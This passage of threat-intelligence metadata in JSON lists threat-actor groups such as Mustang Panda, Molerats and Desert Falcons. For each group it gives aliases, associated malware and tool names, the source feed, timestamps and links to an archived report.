"created_at": "2023-01-06T13:46:38.782181Z", "updated_at": "2026-04-10T02:00:03.097957Z", "deleted_at": null, "main_name": "Operation Parliament", "aliases": [], "source_name": "MISPGALAXY:Operation Parliament", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0c502f6d-640d-4e69-bfb8-328ba6540d4f", "created_at": "2022-10-25T15:50:23.756782Z", "updated_at": "2026-04-10T02:00:05.324924Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "Molerats", "Operation Molerats", "Gaza Cybergang" ], "source_name": "MITRE:Molerats", "tools": [ "MoleNet", "DustySky", "DropBook", "SharpStage", "PoisonIvy" ], "source_id": "MITRE", "reports": null }, { "id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d", "created_at": "2022-10-25T16:07:23.539852Z", "updated_at": "2026-04-10T02:00:04.647734Z", "deleted_at": null, "main_name": "Desert Falcons", "aliases": [ "APT-C-23", "ATK 66", "Arid Viper", "Niobium", "Operation Arid Viper", "Operation Bearded Barbie", "Operation Rebound", "Pinstripe Lightning", "Renegade Jackal", "TAG-63", "TAG-CT1", "Two-tailed Scorpion" ], "source_name": "ETDA:Desert Falcons", "tools": [ "AridSpy", "Barb(ie) Downloader", "BarbWire", "Desert Scorpion", "FrozenCell", "GlanceLove", "GnatSpy", "KasperAgent", "Micropsia", "PyMICROPSIA", "SpyC23", "Viper RAT", "ViperRAT", "VolatileVenom", "WinkChat", "android.micropsia" ], "source_id": "ETDA", "reports": null }, { "id": "04a7ebaa-ebb1-4971-b513-a0c86886d932", "created_at": "2023-01-06T13:46:38.784965Z", "updated_at": "2026-04-10T02:00:03.099088Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "Clean Ursa", "Cloud Atlas", "G0100", "ATK116", "Blue Odin" ], "source_name": "MISPGALAXY:Inception Framework", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f35997d9-ca1e-453f-b968-0e675cc16d97", "created_at": "2023-01-06T13:46:39.490819Z", "updated_at": "2026-04-10T02:00:03.345364Z", "deleted_at": null, "main_name": "Evasive Panda", "aliases": [ "BRONZE HIGHLAND" ], "source_name": "MISPGALAXY:Evasive Panda", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "05cb998c-6e81-47f0-9806-ee4fda72fe0a", "created_at": "2024-11-01T02:00:52.763555Z", "updated_at": "2026-04-10T02:00:05.263997Z", "deleted_at": null, "main_name": "Daggerfly", "aliases": [ "Daggerfly", "Evasive Panda", "BRONZE HIGHLAND" ], "source_name": "MITRE:Daggerfly", "tools": [ "PlugX", "MgBot", "BITSAdmin", "MacMa", "Nightdoor" ], "source_id": "MITRE", "reports": null }, { "id": "812f36f8-e82b-41b6-b9ec-0d23ab0ad6b7", "created_at": "2023-01-06T13:46:39.413725Z", "updated_at": "2026-04-10T02:00:03.31882Z", "deleted_at": null, "main_name": "BRONZE HIGHLAND", "aliases": [ "Evasive Panda", "Daggerfly" ], "source_name": "MISPGALAXY:BRONZE HIGHLAND", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b", "created_at": "2025-08-07T02:03:24.53077Z", "updated_at": "2026-04-10T02:00:03.680525Z", "deleted_at": null, "main_name": "ALUMINUM SARATOGA", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "Extreme Jackal ", "Gaza Cybergang", "Molerats ", "Operation DustySky ", "TA402" ], "source_name": "Secureworks:ALUMINUM SARATOGA", "tools": [ "BlackShades", "BrittleBush", "DarkComet", "LastConn", "Micropsia", "NimbleMamba", "PoisonIvy", "QuasarRAT", "XtremeRat" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "1162e0d4-b69c-423d-a4da-f3080d1d2b0c", "created_at": "2023-01-06T13:46:38.508262Z", "updated_at": "2026-04-10T02:00:03.006018Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "Gaza Cybergang", "Operation Molerats", "Extreme Jackal", "ALUMINUM SARATOGA", "G0021", "BLACKSTEM", "Gaza Hackers Team", "Gaza cybergang" ], "source_name": "MISPGALAXY:Molerats", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "19ac84cc-bb2d-4e0c-ace0-5a7659d89ac7", "created_at": "2022-10-25T16:07:23.422755Z", "updated_at": "2026-04-10T02:00:04.592069Z", "deleted_at": null, "main_name": "Bronze Highland", "aliases": [ "Daggerfly", "Digging Taurus", "Evasive Panda", "Storm Cloud", "StormBamboo", "TAG-102", "TAG-112" ], "source_name": "ETDA:Bronze Highland", "tools": [ "Agentemis", "CDDS", "CloudScout", "Cobalt Strike", "CobaltStrike", "DazzleSpy", "KsRemote", "LOLBAS", "LOLBins", "Living off the Land", "MacMa", "Macma", "MgBot", "Mgmbot", "NetMM", "Nightdoor", "OSX.CDDS", "POCOSTICK", "RELOADEXT", "Suzafk", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "4f7d2815-7504-4818-bf8d-bba18161b111", "created_at": "2025-08-07T02:03:24.613342Z", "updated_at": "2026-04-10T02:00:03.732192Z", "deleted_at": null, "main_name": "BRONZE HIGHLAND", "aliases": [ "Daggerfly", "Daggerfly ", "Evasive Panda ", "Evasive Panda ", "Storm Bamboo " ], "source_name": "Secureworks:BRONZE HIGHLAND", "tools": [ "Cobalt Strike", "KsRemote", "Macma", "MgBot", "Nightdoor", "PlugX" ], "source_id": "Secureworks", "reports": null }, { "id": "02c9f3f6-5d10-456b-9e63-750286048149", "created_at": "2022-10-25T16:07:23.722884Z", "updated_at": "2026-04-10T02:00:04.72726Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "ATK 116", "Blue Odin", "Clean Ursa", "Cloud Atlas", "G0100", "Inception Framework", "Operation Cloud Atlas", "Operation RedOctober", "The Rocra" ], "source_name": "ETDA:Inception Framework", "tools": [ "Lastacloud", "PowerShower", "VBShower" ], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "847f600c-cf90-44c0-8b39-fb0d5adfcef4", "created_at": "2022-10-25T16:07:23.875541Z", "updated_at": "2026-04-10T02:00:04.768142Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "ATK 89", "Aluminum Saratoga", "Extreme Jackal", "G0021", "Gaza Cybergang", "Gaza Hackers Team", "Molerats", "Operation DustySky", "Operation DustySky Part 2", "Operation Molerats", "Operation Moonlight", "Operation SneakyPastes", "Operation TopHat", "TA402", "TAG-CT5" ], "source_name": "ETDA:Molerats", "tools": [ "BadPatch", "Bladabindi", "BrittleBush", "Chymine", "CinaRAT", "Darkmoon", "Downeks", "DropBook", "DustySky", "ExtRat", "Gen:Trojan.Heur.PT", "H-Worm", "H-Worm RAT", "Houdini", "Houdini RAT", "Hworm", "Iniduoh", "IronWind", "Jenxcus", "JhoneRAT", "Jorik", "KasperAgent", "Kognito", "LastConn", "Micropsia", "MoleNet", "Molerat Loader", "NeD Worm", "NimbleMamba", "Njw0rm", "Pierogi", "Poison Ivy", "Quasar RAT", "QuasarRAT", "SPIVY", "Scote", "SharpSploit", "SharpStage", "WSHRAT", "WelcomeChat", "Xtreme RAT", "XtremeRAT", "Yggdrasil", "dinihou", "dunihi", "njRAT", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775438978, "ts_updated_at": 1775792283, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.pdf", "text": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.txt", "img": "https://archive.orkl.eu/5ae5837e687a4928cd5c11a4fe1dedea327c898d.jpg" } }